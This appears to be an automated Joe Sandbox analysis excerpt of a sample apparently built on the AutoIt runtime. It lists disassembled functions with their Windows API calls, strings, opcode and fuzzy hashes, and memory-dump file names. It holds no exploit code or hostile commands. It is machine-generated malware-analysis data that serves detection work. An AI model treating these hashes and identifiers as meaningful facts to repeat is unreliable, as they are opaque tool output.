Opcode ID: c6cbd9c938795f15fe650098a52ba4127aba9cb69cbb47a39906511cc71837a1
Instruction ID: 943e9cae3ccbb72746cfb100dc8f7c3f511012ff5e7c39ebeb604c8b4ecaad93
Opcode Fuzzy Hash: c6cbd9c938795f15fe650098a52ba4127aba9cb69cbb47a39906511cc71837a1
Instruction Fuzzy Hash: AC028C751083419FC724EF24C8819AFBBE5EFA9314F14491DF49A972A2DB30DA49CF52

Function 001E2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 001E2DDD
GetMenuItemCount.USER32(00245890), ref: 001E2E66
DeleteMenu.USER32(00245890,00000005,00000000,000000F5,?,?), ref: 001E2EF6
DeleteMenu.USER32(00245890,00000004,00000000), ref: 001E2EFE
DeleteMenu.USER32(00245890,00000006,00000000), ref: 001E2F06
DeleteMenu.USER32(00245890,00000003,00000000), ref: 001E2F0E
GetMenuItemCount.USER32(00245890), ref: 001E2F16
SetMenuItemInfoW.USER32(00245890,00000004,00000000,00000030), ref: 001E2F4C
GetCursorPos.USER32(?), ref: 001E2F56
SetForegroundWindow.USER32(00000000), ref: 001E2F5F
TrackPopupMenuEx.USER32(00245890,00000000,?,00000000,00000000,00000000), ref: 001E2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001E2F7E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 966a9c4235c4d09547d980def00b8bde6243f90652c0c96586025bb256318100
Instruction ID: 494cee13fac02f9a7824dccc0cd497ea199ffdffa62da2fb912e839bd95fed02
Opcode Fuzzy Hash: 966a9c4235c4d09547d980def00b8bde6243f90652c0c96586025bb256318100
Instruction Fuzzy Hash: 46711271640A95BEEB258F56DC59FAEBFACFB05720F200216F615A61E1C7B15C20CB90

Function 001F88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001F88D7
CoInitialize.OLE32(00000000), ref: 001F8904
CoUninitialize.OLE32 ref: 001F890E
GetRunningObjectTable.OLE32(00000000,?), ref: 001F8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 001F8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00212C0C), ref: 001F8B6F
CoGetObject.OLE32(?,00000000,00212C0C,?), ref: 001F8B92
SetErrorMode.KERNEL32(00000000), ref: 001F8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001F8C25
VariantClear.OLEAUT32(?), ref: 001F8C35

Strings

,,!, xrefs: 001F88C1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,!
API String ID: 2395222682-3142458726
Opcode ID: 15338c2bec9fd73cb501f4201458cc292f91ce789f21cf1dd42022a59970ff17
Instruction ID: 0113ddc16c5fa5c14d57008b05feff83e750784b0a9be711143fd82dd75e41e3
Opcode Fuzzy Hash: 15338c2bec9fd73cb501f4201458cc292f91ce789f21cf1dd42022a59970ff17
Instruction Fuzzy Hash: 44C137B1608309AFC700EF64C88496BB7E9FF89348F04495DFA899B251DB71ED06CB52

Function 001D77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

_memset.LIBCMT ref: 001D786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001D78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001D78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001D78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001D7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 001D792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001D7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001D793A

Strings

\IPC$, xrefs: 001D7882
\CLSID, xrefs: 001D7822
SOFTWARE\Classes\, xrefs: 001D780C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: c5a2fb14c348b6dccdf057ff1c3498daa6b15d6e26e8b87bbf46c1c3d9afbebb
Instruction ID: 6cdcea68e40cc1a9a538970bdfef59ad5768cb2a651eb45b244d60120b821e4a
Opcode Fuzzy Hash: c5a2fb14c348b6dccdf057ff1c3498daa6b15d6e26e8b87bbf46c1c3d9afbebb
Instruction Fuzzy Hash: 894109B2C14229AADF21EBA4DC95DEDB779FF14314F54402AE905A32A1EB309E05CF90

Function 00200E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FFDAD,?,?), ref: 00200E31

Strings

HKCU, xrefs: 00200F21
HKEY_CLASSES_ROOT, xrefs: 00200EC4
HKU, xrefs: 00200F43
HKLM, xrefs: 00200EAF
HKEY_USERS, xrefs: 00200F32
HKEY_LOCAL_MACHINE, xrefs: 00200E9A
HKCC, xrefs: 00200EFF
HKEY_CURRENT_USER, xrefs: 00200F10
HKCR, xrefs: 00200ED9
HKEY_CURRENT_CONFIG, xrefs: 00200EEE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: fae225583cf18e8cffa9f0baa0dba29db7b144e225562bf2cc46d18673aa8b0a
Instruction ID: 0bbcb284a420025a210905cffdb5ff6f33a8813dee2c7b2dcb05687f8a06e839
Opcode Fuzzy Hash: fae225583cf18e8cffa9f0baa0dba29db7b144e225562bf2cc46d18673aa8b0a
Instruction Fuzzy Hash: A6417DB512035B8BEF21EF10D899BEE3764AF26344F140414FC551BAD2DB709D6ADB60

Function 001DF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001BE2A0,00000010,?,Bad directive syntax error,0020F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001DF7C2
LoadStringW.USER32(00000000,?,001BE2A0,00000010), ref: 001DF7C9

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

_wprintf.LIBCMT ref: 001DF7FC
__swprintf.LIBCMT ref: 001DF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001DF88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 001DF7F7
Error: , xrefs: 001DF85B
., xrefs: 001DF873
Line %d (File "%s"):, xrefs: 001DF833
Line %d:, xrefs: 001DF818

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 8d8259636da95e598b1cbc9c8e10e14225a5b0f3e5ae068f8fe198249b770a3c
Instruction ID: fc8f06ccac49fc3a06bf8d1beb33b7098c6e4ba41d03f378508b8e8faac07e02
Opcode Fuzzy Hash: 8d8259636da95e598b1cbc9c8e10e14225a5b0f3e5ae068f8fe198249b770a3c
Instruction Fuzzy Hash: 42214D7295021AABCF11FF90CC4AEEE7739BF28304F04046AF519661A2EB719768DB51

Function 001E52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

Part of subcall function 00187924: _memmove.LIBCMT ref: 001879AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001E5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001E5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001E5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001E537A

Strings

play PlayMe, xrefs: 001E5375
close PlayMe, xrefs: 001E5341, 001E536E
status PlayMe mode, xrefs: 001E532B
alias PlayMe, xrefs: 001E5309
open , xrefs: 001E52DF
play PlayMe wait, xrefs: 001E5364

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 769f987fc0f7f9056d668b9fafbe5b1782d2c6e7dd00fa9d4153b3164ec1b9d9
Instruction ID: 36a7f8bee24f08a6e624715753dceced710436a3ebb8c2a214d516e671b9a527
Opcode Fuzzy Hash: 769f987fc0f7f9056d668b9fafbe5b1782d2c6e7dd00fa9d4153b3164ec1b9d9
Instruction Fuzzy Hash: CF11C871E6065979D720B762CC4ADFFBB7DFBA2B44F100419B411960D1EFA04E04CBA1

Function 001E46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001E46D2
gethostname.WSOCK32(?,00000100), ref: 001E46EC
gethostbyname.WSOCK32(?), ref: 001E46F9
_wcscpy.LIBCMT ref: 001E4721
_memmove.LIBCMT ref: 001E4734
inet_ntoa.WSOCK32(?), ref: 001E473F
_strcat.LIBCMT ref: 001E474D
_wcscpy.LIBCMT ref: 001E4764
WSACleanup.WSOCK32 ref: 001E4772
_wcscpy.LIBCMT ref: 001E4780

Strings

0.0.0.0, xrefs: 001E471B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 7d979a2786d4a3094521eee7b381f26de57c2c1af8846a9ba084663282b2e42e
Instruction ID: ef4fabc3bc12c3e5548ca8df268ef40e7fcfabc0c2d3f03334c1d880ff4e7b39
Opcode Fuzzy Hash: 7d979a2786d4a3094521eee7b381f26de57c2c1af8846a9ba084663282b2e42e
Instruction Fuzzy Hash: 8F113635900214AFDB24AB75AC4AEEE77BCEF16711F0441BAF445960A2FF718E818B91

Function 001E4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 001E4F7A

Part of subcall function 001A049F: timeGetTime.WINMM(?,75A4B400,00190E7B), ref: 001A04A3

Sleep.KERNEL32(0000000A), ref: 001E4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 001E4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001E4FEC
SetActiveWindow.USER32 ref: 001E500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001E5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 001E5038
Sleep.KERNEL32(000000FA), ref: 001E5043
IsWindow.USER32 ref: 001E504F
EndDialog.USER32(00000000), ref: 001E5060

Strings

BUTTON, xrefs: 001E4FDE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4719567600784449d5b917ac9eb8f487f2c2eac1d6787588e9ea5f02ac723344
Instruction ID: 2b6170f68c27ce523349b5f920754d6c199bc42818ab5b3950b4f4631a3f6e09
Opcode Fuzzy Hash: 4719567600784449d5b917ac9eb8f487f2c2eac1d6787588e9ea5f02ac723344
Instruction Fuzzy Hash: 2621C378640B44AFE7615F71FD8CB6A3B6AFB0B749F541024F506829B2CBB18D508A72

Function 001ED58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

CoInitialize.OLE32(00000000), ref: 001ED5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001ED67D
SHGetDesktopFolder.SHELL32(?), ref: 001ED691
CoCreateInstance.OLE32(00212D7C,00000000,00000001,00238C1C,?), ref: 001ED6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001ED74C
CoTaskMemFree.OLE32(?,?), ref: 001ED7A4
_memset.LIBCMT ref: 001ED7E1
SHBrowseForFolderW.SHELL32(?), ref: 001ED81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001ED840
CoTaskMemFree.OLE32(00000000), ref: 001ED847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001ED87E
CoUninitialize.OLE32(00000001,00000000), ref: 001ED880

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 6da826fe5386598376337f5e99254f2f1ce9feb693661edd97e48a425cd95b95
Instruction ID: dcc8ab8974ce87392fb9766727b99f3faea7f6ca866149c84e6c243dd4c91262
Opcode Fuzzy Hash: 6da826fe5386598376337f5e99254f2f1ce9feb693661edd97e48a425cd95b95
Instruction Fuzzy Hash: D8B10B75A00209AFDB14DFA5D888DAEBBB9FF49304B148469F909DB261DB30EE41CB50

Function 001DC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 001DC283
GetWindowRect.USER32(00000000,?), ref: 001DC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001DC2F3
GetDlgItem.USER32(?,00000002), ref: 001DC2FE
GetWindowRect.USER32(00000000,?), ref: 001DC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001DC364
GetDlgItem.USER32(?,000003E9), ref: 001DC372
GetWindowRect.USER32(00000000,?), ref: 001DC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001DC3C6
GetDlgItem.USER32(?,000003EA), ref: 001DC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001DC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 001DC3FE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
Instruction ID: fced97982cfbdb375e576de67d9e6df8eb806a913d9b169c4caec55e6c3c1e65
Opcode Fuzzy Hash: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
Instruction Fuzzy Hash: 4F515D71B40305ABDB18CFA9DD89AAEBBBAFB88310F14852DF515D76A1DB709D00CB50

Function 0018201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001820D3
KillTimer.USER32(-00000001,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 0018216E
DestroyAcceleratorTable.USER32(00000000), ref: 001BBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBD0A
DeleteObject.GDI32(00000000), ref: 001BBD1C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 861375e50a0e86d9d028c03110a3fc01f241731dabfa0f15789f39f4277e91e6
Instruction ID: 7109b1d8f08e9f9b95d8e3356644a2a9c45dae5f292473ce035c56730065d161
Opcode Fuzzy Hash: 861375e50a0e86d9d028c03110a3fc01f241731dabfa0f15789f39f4277e91e6
Instruction Fuzzy Hash: 2C61BE35104B10DFCB3AAF14E98CB29B7F2FF41316F604529E4829A972C7B5A991DF50

Function 001821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC

GetSysColor.USER32(0000000F), ref: 001821D3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 85f676330cfb3a48c08f28dea86b33c970beb23fd796eee181ca90e11c939ca0
Instruction ID: 3e5989f14c151c13ddf47a6afe4c164a0add1eb21a6573195f1e8d262b71e4b9
Opcode Fuzzy Hash: 85f676330cfb3a48c08f28dea86b33c970beb23fd796eee181ca90e11c939ca0
Instruction Fuzzy Hash: E841A431044640DFDB266F28EC88BB97B66EB06331F244365FD658A5E2C7718D41DF51

Function 001EA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0020F910), ref: 001EA90B
GetDriveTypeW.KERNEL32(00000061,002389A0,00000061), ref: 001EA9D5
_wcscpy.LIBCMT ref: 001EA9FF

Strings

cdrom, xrefs: 001EA927
unknown, xrefs: 001EA996
removable, xrefs: 001EA93D
ramdisk, xrefs: 001EA97F
fixed, xrefs: 001EA953
all, xrefs: 001EA911
network, xrefs: 001EA969

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 400fa169945761aac2aaaa24d6c8a3845bb7520deacbe9ff9126da6df9d13af8
Instruction ID: 3b7dc9c87235c7c800636e3bdcd7e7b4b7de69304086a2a479c534e9d5755259
Opcode Fuzzy Hash: 400fa169945761aac2aaaa24d6c8a3845bb7520deacbe9ff9126da6df9d13af8
Instruction Fuzzy Hash: 6A51DF711183419FC304EF15C892AAFB7A5EFA5308F95482DF496572A2DB30EE08CB53

Function 00189837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00189862
__swprintf.LIBCMT ref: 001898AC
__i64tow.LIBCMT ref: 001BF5E6

Strings

%.15g, xrefs: 001898A6
False, xrefs: 001BF5AE
0x%p, xrefs: 001BF5C8
True, xrefs: 001BF5A7

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 4c5e240be7e579c0b69911b24e9a83a6d67a0154a53687e3f4563b6f0a33b04f
Instruction ID: c4c6589cd8b37fe70cd50af879cb6c290b5cd8bf39a71677b9a07a98a21ca6c4
Opcode Fuzzy Hash: 4c5e240be7e579c0b69911b24e9a83a6d67a0154a53687e3f4563b6f0a33b04f
Instruction Fuzzy Hash: 9E41E975500209AFDB25EF74DC46EB673E8EF5B300F24446EF549DB291EB319A428B10

